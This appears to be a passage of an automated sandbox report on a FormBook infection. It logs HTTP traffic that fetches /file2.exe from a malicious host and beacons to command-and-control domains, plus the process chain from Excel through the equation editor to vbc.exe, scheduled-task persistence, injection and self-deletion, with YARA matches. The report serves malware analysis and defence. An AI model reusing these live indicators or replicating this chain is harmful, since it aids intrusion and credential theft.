                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:24:10.186613083 CET1OUTGET /file2.exe HTTP/1.1
                                                                                                                                                          Accept: */*
                                                                                                                                                          Accept-Encoding: gzip, deflate
                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                                                                                                                                                          Host: medicelcoolers.cn
                                                                                                                                                          Connection: Keep-Alive
                                                                                                                                                          Jan 13, 2021 17:24:10.240417004 CET1INHTTP/1.1 200 OK
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:24:10 GMT
                                                                                                                                                          Content-Type: application/x-msdos-program
                                                                                                                                                          Content-Length: 582656
                                                                                                                                                          Last-Modified: Wed, 13 Jan 2021 14:34:47 GMT
                                                                                                                                                          Connection: keep-alive
                                                                                                                                                          ETag: "5fff0507-8e400"
                                                                                                                                                          X-Powered-By: PleskLin
                                                                                                                                                          Accept-Ranges: bytes


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          1192.168.2.2249166160.153.136.380C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:25:24.489295959 CET616OUTGET /csv8/?1bwhC=bczMUAuUcHXQfOtoDA3FaFpfgVKghqiBPueyWD+LhAeNSODQxsbOhA9E/efN84iGcDGK0Q==&tB=TtdpPpwhOlt HTTP/1.1
                                                                                                                                                          Host: www.fixmygearfast.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:25:24.537956953 CET617INHTTP/1.1 302 Found
                                                                                                                                                          Connection: close
                                                                                                                                                          Pragma: no-cache
                                                                                                                                                          cache-control: no-cache
                                                                                                                                                          Location: /csv8/?1bwhC=bczMUAuUcHXQfOtoDA3FaFpfgVKghqiBPueyWD+LhAeNSODQxsbOhA9E/efN84iGcDGK0Q==&tB=TtdpPpwhOlt


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          2192.168.2.224916734.102.136.18080C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:25:29.636987925 CET617OUTGET /csv8/?1bwhC=4rzgp1jcc8l4Wxs4KztLQnvubqNqMY/2ozhXYXCY6yGJDbul1z8E6+SozVJniMc1Iz21RA==&tB=TtdpPpwhOlt HTTP/1.1
                                                                                                                                                          Host: www.brainandbodystrengthcoach.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:25:29.775403976 CET618INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: openresty
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:25:29 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 275
                                                                                                                                                          ETag: "5ffc83a1-113"
                                                                                                                                                          Via: 1.1 google
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                          Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>


                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                                          3192.168.2.224916835.172.94.180C:\Windows\explorer.exe
                                                                                                                                                          TimestampkBytes transferredDirectionData
                                                                                                                                                          Jan 13, 2021 17:25:40.499638081 CET619OUTGET /csv8/?1bwhC=SBCaTdpk9GFN+fS4Ft/T56OwK5/x5qMPVVvaK278SLjI2qusdtII6CngZJh83HH0bt2tCA==&tB=TtdpPpwhOlt HTTP/1.1
                                                                                                                                                          Host: www.stattests.com
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                                                                                          Data Ascii:
                                                                                                                                                          Jan 13, 2021 17:25:40.625456095 CET619INHTTP/1.1 403 Forbidden
                                                                                                                                                          Server: nginx
                                                                                                                                                          Date: Wed, 13 Jan 2021 16:25:40 GMT
                                                                                                                                                          Content-Type: text/html
                                                                                                                                                          Content-Length: 146
                                                                                                                                                          Connection: close
                                                                                                                                                          Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 33 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                          Data Ascii: <html><head><title>403 Forbidden</title></head><body><center><h1>403 Forbidden</h1></center><hr><center>nginx</center></body></html>


                                                                                                                                                          Code Manipulations

                                                                                                                                                          Statistics

                                                                                                                                                          Behavior

                                                                                                                                                          Click to jump to process

                                                                                                                                                          System Behavior

                                                                                                                                                          General

                                                                                                                                                          Start time:17:23:53
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                                                                                                                                                          Imagebase:0x13fdd0000
                                                                                                                                                          File size:27641504 bytes
                                                                                                                                                          MD5 hash:5FB0A0F93382ECD19F5F499A5CAA59F0
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:13
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
                                                                                                                                                          Imagebase:0x400000
                                                                                                                                                          File size:543304 bytes
                                                                                                                                                          MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:16
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Users\Public\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Users\Public\vbc.exe'
                                                                                                                                                          Imagebase:0x190000
                                                                                                                                                          File size:582656 bytes
                                                                                                                                                          MD5 hash:92FF500A693078263908C83B4B290481
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:.Net C# or VB.NET
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000004.00000002.2184708337.00000000031F9000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Antivirus matches:
                                                                                                                                                          • Detection: 100%, Joe Sandbox ML
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:19
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\JcEEHoQdnETCO' /XML 'C:\Users\user\AppData\Local\Temp\tmp85C4.tmp'
                                                                                                                                                          Imagebase:0x420000
                                                                                                                                                          File size:179712 bytes
                                                                                                                                                          MD5 hash:2003E9B15E1C502B146DAD2E383AC1E3
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:21
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:{path}
                                                                                                                                                          Imagebase:0xf30000
                                                                                                                                                          File size:2688144 bytes
                                                                                                                                                          MD5 hash:A8CCD298F718423D35CFD925063F082D
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2237842209.0000000000400000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2237768631.00000000002D0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000007.00000002.2237582542.00000000000F0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:low

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:26
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\explorer.exe
                                                                                                                                                          Wow64 process (32bit):false
                                                                                                                                                          Commandline:
                                                                                                                                                          Imagebase:0xffca0000
                                                                                                                                                          File size:3229696 bytes
                                                                                                                                                          MD5 hash:38AE1B3C38FAEF56FE4907922F0385BA
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:50
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:C:\Windows\SysWOW64\wlanext.exe
                                                                                                                                                          Imagebase:0x9c0000
                                                                                                                                                          File size:77312 bytes
                                                                                                                                                          MD5 hash:6F44F5C0BC6B210FE5F5A1C8D899AD0A
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Yara matches:
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2379911994.0000000000080000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2380116229.0000000000330000.00000004.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, Author: Joe Security
                                                                                                                                                          • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                                                                                          • Rule: Formbook, Description: detect Formbook in memory, Source: 00000009.00000002.2380046748.00000000001E0000.00000040.00000001.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                                                                                          Reputation:moderate

                                                                                                                                                          General

                                                                                                                                                          Start time:17:24:52
                                                                                                                                                          Start date:13/01/2021
                                                                                                                                                          Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                          Wow64 process (32bit):true
                                                                                                                                                          Commandline:/c del 'C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe'
                                                                                                                                                          Imagebase:0x4aa00000
                                                                                                                                                          File size:302592 bytes
                                                                                                                                                          MD5 hash:AD7B9C14083B52BC532FBA5948342B98
                                                                                                                                                          Has elevated privileges:true
                                                                                                                                                          Has administrator privileges:true
                                                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                                                          Reputation:high

                                                                                                                                                          Disassembly

                                                                                                                                                          Code Analysis

                                                                                                                                                          Reset < >